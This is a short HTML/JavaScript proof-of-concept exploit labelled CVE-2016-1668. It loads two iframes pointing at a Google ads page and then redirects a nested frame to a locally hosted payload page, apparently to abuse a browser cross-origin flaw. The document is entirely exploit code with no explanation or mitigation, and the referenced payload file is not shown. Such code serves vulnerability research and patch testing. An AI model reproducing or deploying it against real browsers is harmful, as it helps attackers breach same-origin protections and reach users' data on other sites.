<script>
if (location.protocol == 'file:') {
  throw alert('HTTP server is required.');
}

var i1 = document.documentElement.appendChild(document.createElement('iframe'));
var i2 = document.documentElement.appendChild(document.createElement('iframe'));
i1.onload = i2.onload = f;
i1.src = i2.src = 'http://www.google.com/intl/en/ads/?fg=1';

var c = 0;
function f() {
  if (++c == 2) {
    frames[0][0].location = 'http://127.0.0.1/download_poc/CVE-2016-1668/f.html';
  }
}
</script>